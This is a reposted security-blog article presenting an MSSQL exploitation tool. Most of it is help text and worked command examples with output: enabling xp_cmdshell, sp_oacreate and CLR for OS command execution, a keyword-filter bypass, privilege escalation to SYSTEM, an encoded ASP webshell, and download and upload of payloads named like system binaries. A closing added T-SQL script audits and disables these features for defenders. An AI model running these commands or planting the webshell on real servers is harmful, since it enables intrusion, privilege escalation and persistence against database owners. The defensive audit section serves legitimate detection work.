MSSQL Multi-Function Command Exploitation Tool for Penetration Testing

admin, 2024-06-11 10:47:51
Statement: the security tools and projects shared by this public account come from the internet and are provided for security research and learning only. Anyone who uses them for other purposes bears full legal and joint liability; the tool authors and this account are not involved.

Tool introduction
An MSSQL exploitation tool written in Go by @Mayter, drawing on the projects listed below. It covers command execution with echoed output through xp_cmdshell and sp_oacreate, loading CLR assemblies to perform the corresponding operations, file upload, Agent jobs and related operations.

https://github.com/Ridter/PySQLTools
https://github.com/uknowsec/SharpSQLTools
https://github.com/Ridter/MSSQL_CLR
https://github.com/JKme/cube/blob/master/core/sqlcmdmodule/mssql3.go
https://quan9i.top/post/SQL%20Server%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%B1%87%E6%80%BB/

Parameters and examples

Help:

NAME:
   Mssql Toolkit - mssql command tool

USAGE:
   mssql-command-tools_Windows_64.exe [global options] command [command options] [arguments...]

AUTHOR:
   Microsoft.com clr参考: https://github.com/uknowsec/SharpSQLTools/

COMMANDS:
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --server value, --host value, -s value  The database server (default: "127.0.0.1")
   --user value, -u value                  The database user (default: "sa")
   --password value, -p value              The database password
   --database value, -d value              The database name (default: "msdb")
   --port value, -P value                  The database port (default: 1433)
   --option value                          -xcmd, -X powershell (default: "whoami")
   --query value, -q value, --sql value    SQL query (default: "select @@version")
   --cmd value, -c value, --exec value     Exec System Command | xp_cmdshell命令执行 (default: "whoami")
   --cmd1 value, --c1 value                Exec System Command | sp_oacreate无回显执行 (default: "whoami >C:\whoami.log")
   --cmd2 value, --c2 value                Exec System Command | sp_oacreate有回显执行 | wscript.shell (default: "whoami")
   --cmdsp value                           Exec System Command | sp_oacreate有回显执行 | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")
   --cmd3 value, --c3 value                Exec System Command | clr执行 | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
   --cmdpy value                           Exec System Command | clr执行 | clr命令参考: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")
   --cmd4 value, --c4 value                Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
   --cmd5 value, --c5 value                Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
   --cmd6 value, --c6 value                Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (default: "-c6 whoami")
   --cmd7 value, --c7 value                Exec System Command | 自写clr执行 (default: "-c7 whoami")
   --cmd8 value, --c8 value                Exec System Command | r language command (default: "-c8 whoami")
   --cmd9 value, --c9 value                Exec System Command | python language command (default: "-c9 whoami")
   --cmd10 value, --c10 value              Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\windows\temp\123.txt")
   --cmd11 value, --c11 value              Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")
   --dir value, --dirtree value            xp_dirtree列目录 | dir c:
   --path value                            网站路径 -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\inetpub\wwwroot\cmd.asp")
   --local value                           本地路径 localFile (default: "c:\1.txt")
   --remote value                          远程路径 remoteFile (default: "C:\Windows\Temp\1.txt")
   --code value                            -path + -code | 如果代码有"就加来匹配<%eval request("cmd")%>网站路径和asp密码默认:LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")
   --downurl value                         下载文件的url地址 | http://www.microsoft.com/defender.exe
   --filepath value                        下载文件的路径 | c:\programdata\svchost.exe
   --debug                                 Debug info
   --enable, -e                            Enabled xp_cmdshell
   --disable, --diclose                    Disable xp_cmdshell
   --ole, --oleopen                        Enabled sp_oacreate
   --dole, --dolose                        Disable sp_oacreate
   --clr, --clropen                        Enabled clr enabled
   --dclr, --dclose                        Disable clr enabled
   --rlce, --rlceopen                      r|python languag eenabled
   --jobopen                               MSSQL Agent Job服务开启
   --install_clr, --in_clr                 install clr  | --cmd3 "clr_exec whoami" | clr命令参考: https://github.com/uknowsec/SharpSQLTools/
   --uninstall_clr, --un_clr               uninstall clr | --cmd3 "clr_exec whoami"
   --installpy_clr, --inpy_clr             installpy clr  | --cmdpy "clr_exec whoami" | clr命令参考: https://github.com/Ridter/PySQLTools
   --uninstallpy_clr, --unpy_clr           uninstallpy clr | --cmdpy "clr_exec whoami"
   --install_clrcmd, --in_clrcmd           install clrcmd | "--c4 net --c5 user"
   --uninstall_clrcmd, --un_clrcmd         uninstall clrcmd | "--c4 net --c5 user"
   --install_clrcmd1, --in_clrcmd1         install clrcmd1 | --cmd7 "whoami"
   --uninstall_clrcmd1, --un_clrcmd1       uninstall clrcmd | --cmd7 "whoami"
   --install_clrcmd2, --in_clrcmd2         install clrcmd2 | --cmd11 "whoami"
   --uninstall_clrcmd2, --un_clrcmd2       uninstall clrcmd2 | --cmd11 "whoami"
   --upload                                --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe
   --help, -h                              show help

Examples:

Enable the xp_cmdshell component
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --enable/--e

Enable the sp_oacreate component
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --ole/--o

Enable the CLR component
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin -clr

xp_cmdshell execution
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd "whoami"
nt service\mssqlserver

Bypassing a filter on the xp_cmdshell keyword
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd6 "whoami"
nt service\mssqlserver

sp_oacreate execution (slightly different, but essentially the same)
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd2 "whoami"
nt service\mssqlserver
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdsp "whoami"
nt service\mssqlserver

Install the SharpSQLTools CLR assembly
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --install_clr
Clrcmd Install SharpSQLTools CLR Success.

Execute a command
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_exec whoami"
mssql: [+] Process: cmd.exe
mssql: [+] arguments:  /c whoami
mssql: [+] RunCommand: cmd.exe  /c whoami
mssql:
mssql: nt service\mssqlserver

Privilege escalation
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_badpotato whoami"
mssql: [*] CreateNamedPipeW Success! IntPtr:4048
mssql: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1816351484896
mssql: [*] ConnectNamePipe Success!
mssql: [*] CurrentUserName : MSSQLSERVER
mssql: [*] CurrentConnectPipeUserName : SYSTEM
mssql: [*] ImpersonateNamedPipeClient Success!
mssql: [*] OpenThreadToken Success! IntPtr:6840
mssql: [*] DuplicateTokenEx Success! IntPtr:6556
mssql: [*] SetThreadToken Success!
mssql: [*] CreateOutReadPipe Success! out_read:5536 out_write:5528
mssql: [*] CreateErrReadPipe Success! err_read:3436 err_write:5072
mssql: [*] CreateProcessWithTokenW Success! ProcessPid:9608
mssql: nt authority\system

Uninstall the SharpSQLTools CLR assembly
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstall_clr
Uninstall SharpSQLTools CLR Success.

Install the PySQLTools CLR assembly
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --installpy_clr
Clrcmd Install PySQLTools Clr Success.

Execute a command
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdpy "clr_exec whoami"
mssql: [+] Successfully unhooked ETW!
mssql: [*] No dll to patch
mssql: [+] Process: cmd.exe
mssql: [+] arguments:  /c whoami
mssql: [+] RunCommand: cmd.exe  /c whoami
mssql:
mssql: nt service\mssqlserver

Privilege escalation

Uninstall the PySQLTools CLR assembly
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstallpy_clr
Uninstall PySQLTools Clr Success.

mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd4 net -cmd5 user
\ 的用户帐户
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
命令运行完毕,但发生一个或多个错误。

mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd7 "whoami"
mssql: Command is running, please wait.
mssql: nt service\mssqlserver
mssql: nt service\mssqlserver

r language command (default: "-c8 whoami")
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd8 "whoami"
nt service\mssqllaunchpad

python language command (default: "-c9 whoami")
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd9 "whoami"
nt service\mssqllaunchpad

Run CreateAndStartJob
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd10 "whoami >c:\programdata\test.txt"
CreateAndStartJob Command Success!

When permissions are insufficient
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_efspotato net start SQLSERVERAGENT"

List a directory
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\programdata"
subdirectory    depth   file
123.dll
Application Data
Documents
Huorong
Microsoft
MSSQLSERVER
Package Cache
regid.1991-06.com.microsoft
SoftwareDistribution
SSIS
Telemetry
Templates
test.txt
USOPrivate
USOShared
VMware
「开始」菜单
桌面
Command List Dir Success.

-x cmd command
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -x --cmd11 "whoami"
[]
nt service\mssqlserver

-X powershell command
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -X --cmd11 "Get-Process explorer"
[]
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   2296     113    71352     183772              1304   1 explorer

Upload a file
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --upload --local c:\Database.dll --remote C:\programdata\Database.dll
[*] Uploading 'c:\Database.dll' to 'C:\programdata\Database.dll'...
[!] C:\programdata\Database.dll Upload Success
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\programdata"
subdirectory    depth   file
123.dll
Application Data
Database.dll
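Every path the tool drives (xp_cmdshell, sp_oacreate, CLR assemblies, R/Python external scripts, Agent jobs) leaves a footprint in the server's own configuration and catalog views, which is where a defender checks for it. The following T-SQL audit script is an added example written for this page; it is not part of mssql-command-tool or of any of the referenced projects. It uses only documented SQL Server catalog views, DMVs and sp_configure option names, and assumes it is run by a sysadmin login on the instance being reviewed (the `AUDIT-SELF-EXCLUDE` marker is a constructed string used only so the plan-cache query does not match itself).

```sql
-- Added audit script (not part of mssql-command-tool or the referenced projects).
-- Run as a sysadmin login on the instance under review.

-- 1. Surface-area options that the tool's -e / --ole / --clr / --rlce switches turn on.
--    value_in_use is what is live now; value != value_in_use means a change is pending.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',   -- sp_OACreate / sp_OAMethod
               'clr enabled',
               'clr strict security',          -- SQL Server 2017+: UNSAFE assemblies must be signed or trusted
               'external scripts enabled',     -- R / Python through the Launchpad service
               'Agent XPs')                    -- needed to create jobs from T-SQL
ORDER BY name;

-- 2. User-defined CLR assemblies and their permission set. Command-execution assemblies
--    need UNSAFE (permission_set = 3). The tool targets msdb by default (-d "msdb");
--    repeat this query in every other user database as well.
USE msdb;
SELECT DB_NAME() AS database_name, a.name, a.permission_set_desc,
       USER_NAME(a.principal_id) AS owner_name, a.create_date, a.modify_date
FROM sys.assemblies AS a
WHERE a.is_user_defined = 1
ORDER BY a.create_date DESC;

-- 3. Assembly hashes added to the server-wide trust list (SQL Server 2017+).
--    Unsigned UNSAFE assemblies can only load under clr strict security if their hash is here,
--    so an unexplained entry is a strong signal. Remove this query on older versions.
SELECT hash, description, create_date, created_by
FROM sys.trusted_assemblies;

-- 4. Agent jobs with operating-system or PowerShell steps, newest first.
SELECT j.name AS job_name, j.date_created, SUSER_SNAME(j.owner_sid) AS owner_name,
       s.step_id, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
ORDER BY j.date_created DESC;

-- 5. Statements still in the plan cache that reference the procedures above.
--    The marker on the last line keeps this audit query out of its own results.
SELECT qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE (st.text LIKE '%xp_cmdshell%'
    OR st.text LIKE '%sp_OACreate%'
    OR st.text LIKE '%CREATE ASSEMBLY%'
    OR st.text LIKE '%sp_add_trusted_assembly%'
    OR st.text LIKE '%sp_execute_external_script%'
    OR st.text LIKE '%sp_add_job%')
  AND st.text NOT LIKE '%AUDIT-SELF-EXCLUDE%'
ORDER BY qs.last_execution_time DESC;

-- 6. Remediation: turn the options back off (uncomment to run). 'external scripts enabled'
--    only takes effect after a service restart, which is why step 1 shows value and value_in_use.
/*
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'external scripts enabled', 0;
EXEC sp_configure 'clr enabled', 0;   -- only if no legitimate CLR assemblies are in use
RECONFIGURE;
*/
```

The `-c6` entry in the help text above, which submits the same xp_cmdshell call in a form that evades keyword filtering, is the reason query 1 matters more than any string-based filter: the only reliable control is the option being off and the application login not holding sysadmin (the examples all authenticate as `sa`). Queries 2 to 4 are worth scheduling, since a CLR assembly or Agent job persists after the tool's session ends, and the `--uninstall_clr` steps shown above are only run by a tidy operator.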

Download

https://github.com/Mayter/mssql-command-tool

Originally published by the WeChat public account 天驿安全: MSSQL Multi-Function Command Exploitation Tool for Penetration Testing

Reposted by CN-SEC中文网 (thanks to the original author; please keep this link when reproducing): https://cn-sec.com/archives/2836333.html
